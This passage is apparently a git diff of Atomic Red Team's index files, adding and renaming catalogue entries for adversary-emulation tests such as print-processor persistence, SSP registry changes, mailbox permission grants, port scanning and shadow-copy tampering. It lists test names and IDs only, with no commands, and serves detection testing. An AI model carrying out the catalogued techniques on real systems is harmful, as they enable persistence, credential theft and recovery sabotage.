defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
@@ -566,6 +567,7 @@ privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
+privilege-escalation,T1547.012,Boot or Logon Autostart Execution: Print Processors,1,Print Processors,f7d38f47-c61b-47cc-a59d-fc0368f47ed0,powershell
privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
@@ -580,7 +582,8 @@ privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter conta
privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
-privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,2,Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry,de3f8e74-3351-4fdb-a442-265dbf231738,powershell
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
@@ -858,6 +861,7 @@ persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with ref
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
+persistence,T1547.012,Boot or Logon Autostart Execution: Print Processors,1,Print Processors,f7d38f47-c61b-47cc-a59d-fc0368f47ed0,powershell
persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
persistence,T1137.006,Office Application Startup: Add-ins,2,Persistent Code Execution Via Excel Add-in File (XLL),9c307886-9fef-41d5-b344-073a0f5b2f5f,powershell
@@ -879,7 +883,8 @@ persistence,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Por
persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
-persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,2,Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry,de3f8e74-3351-4fdb-a442-265dbf231738,powershell
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
@@ -1009,6 +1014,7 @@ persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
+persistence,T1098.002,Account Manipulation: Additional Email Delegate Permissions,1,EXO - Full access mailbox permission granted to a user,17d046be-fdd0-4cbb-b5c7-55c85d9d0714,powershell
persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
@@ -1567,6 +1573,7 @@ discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-
discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
+discovery,T1046,Network Service Discovery,10,Port-Scanning /24 Subnet with PowerShell,05df2a79-dba6-4088-a804-9ca0802ca8e4,powershell
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
@@ -1614,6 +1621,7 @@ impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
+impact,T1490,Inhibit System Recovery,10,Windows - vssadmin Resize Shadowstorage Volume,da558b07-69ae-41b9-b9d4-4d98154a7049,powershell
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
diff --git a/atomics/Indexes/Indexes-CSV/office-365-index.csv b/atomics/Indexes/Indexes-CSV/office-365-index.csv
index 5f186c78..98b1bf40 100644
--- a/atomics/Indexes/Indexes-CSV/office-365-index.csv
+++ b/atomics/Indexes/Indexes-CSV/office-365-index.csv
@@ -2,3 +2,4 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
collection,T1114.003,Email Collection: Email Forwarding Rule,1,Office365 - Email Forwarding,3234117e-151d-4254-9150-3d0bac41e38c,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,Office 365 - Set Audit Bypass For a Mailbox,c9a2f6fe-7197-488c-af6d-10c782121ca6,powershell
+persistence,T1098.002,Account Manipulation: Additional Email Delegate Permissions,1,EXO - Full access mailbox permission granted to a user,17d046be-fdd0-4cbb-b5c7-55c85d9d0714,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 507a5088..5b56c0df 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -183,6 +183,7 @@ defense-evasion,T1112,Modify Registry,53,Windows Auto Update Option to Notify be
defense-evasion,T1112,Modify Registry,54,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
defense-evasion,T1112,Modify Registry,55,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
defense-evasion,T1112,Modify Registry,56,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
+defense-evasion,T1112,Modify Registry,57,Allow Simultaneous Download Registry,37950714-e923-4f92-8c7c-51e4b6fffbf6,command_prompt
defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
@@ -395,6 +396,7 @@ privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
+privilege-escalation,T1547.012,Boot or Logon Autostart Execution: Print Processors,1,Print Processors,f7d38f47-c61b-47cc-a59d-fc0368f47ed0,powershell
privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
@@ -406,7 +408,8 @@ privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS
privilege-escalation,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
-privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,2,Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry,de3f8e74-3351-4fdb-a442-265dbf231738,powershell
privilege-escalation,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
@@ -593,6 +596,7 @@ persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service
persistence,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
+persistence,T1547.012,Boot or Logon Autostart Execution: Print Processors,1,Print Processors,f7d38f47-c61b-47cc-a59d-fc0368f47ed0,powershell
persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
persistence,T1137.006,Office Application Startup: Add-ins,2,Persistent Code Execution Via Excel Add-in File (XLL),9c307886-9fef-41d5-b344-073a0f5b2f5f,powershell
@@ -613,7 +617,8 @@ persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry
persistence,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
-persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,2,Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry,de3f8e74-3351-4fdb-a442-265dbf231738,powershell
persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -1072,6 +1077,7 @@ discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de
discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
+discovery,T1046,Network Service Discovery,10,Port-Scanning /24 Subnet with PowerShell,05df2a79-dba6-4088-a804-9ca0802ca8e4,powershell
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
@@ -1102,6 +1108,7 @@ impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
+impact,T1490,Inhibit System Recovery,10,Windows - vssadmin Resize Shadowstorage Volume,da558b07-69ae-41b9-b9d4-4d98154a7049,powershell
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/google-workspace-index.md b/atomics/Indexes/Indexes-Markdown/google-workspace-index.md
index c28e9cc2..bc380226 100644
--- a/atomics/Indexes/Indexes-Markdown/google-workspace-index.md
+++ b/atomics/Indexes/Indexes-Markdown/google-workspace-index.md
@@ -74,7 +74,7 @@
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index b2c3e27f..7bb34e03 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -343,6 +343,7 @@
- Atomic Test #54: Do Not Connect To Win Update [windows]
- Atomic Test #55: Tamper Win Defender Protection [windows]
- Atomic Test #56: Snake Malware Registry Blob [windows]
+ - Atomic Test #57: Allow Simultaneous Download Registry [windows]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -822,7 +823,8 @@
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.012 Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md)
+ - Atomic Test #1: Print Processors [windows]
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -852,7 +854,8 @@
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- - Atomic Test #1: Modify SSP configuration in registry [windows]
+ - Atomic Test #1: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry [windows]
+ - Atomic Test #2: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry [windows]
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
@@ -1312,7 +1315,8 @@
- [T1137 Office Application Startup](../../T1137/T1137.md)
- Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.012 Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md)
+ - Atomic Test #1: Print Processors [windows]
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1356,7 +1360,8 @@
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- - Atomic Test #1: Modify SSP configuration in registry [windows]
+ - Atomic Test #1: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry [windows]
+ - Atomic Test #2: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry [windows]
- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1131 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1584,7 +1589,8 @@
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
-- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1098.002 Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md)
+ - Atomic Test #1: EXO - Full access mailbox permission granted to a user [office-365]
- T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
@@ -2403,6 +2409,7 @@
- Atomic Test #7: WinPwn - bluekeep [windows]
- Atomic Test #8: WinPwn - fruit [windows]
- Atomic Test #9: Network Service Discovery for Containers [containers]
+ - Atomic Test #10: Port-Scanning /24 Subnet with PowerShell [windows]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
@@ -2577,6 +2584,7 @@
- Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
- Atomic Test #8: Windows - Disable the SR scheduled task [windows]
- Atomic Test #9: Disable System Restore Through Registry [windows]
+ - Atomic Test #10: Windows - vssadmin Resize Shadowstorage Volume [windows]
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/office-365-index.md b/atomics/Indexes/Indexes-Markdown/office-365-index.md
index 2d42ec89..3cc71395 100644
--- a/atomics/Indexes/Indexes-Markdown/office-365-index.md
+++ b/atomics/Indexes/Indexes-Markdown/office-365-index.md
@@ -103,7 +103,8 @@
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1098.002 Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md)
+ - Atomic Test #1: EXO - Full access mailbox permission granted to a user [office-365]
- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 839f1284..7aebd069 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -249,6 +249,7 @@
- Atomic Test #54: Do Not Connect To Win Update [windows]
- Atomic Test #55: Tamper Win Defender Protection [windows]
- Atomic Test #56: Snake Malware Registry Blob [windows]
+ - Atomic Test #57: Allow Simultaneous Download Registry [windows]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -593,7 +594,8 @@
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- Atomic Test #5: Remote Service Installation CMD [windows]
-- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.012 Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md)
+ - Atomic Test #1: Print Processors [windows]
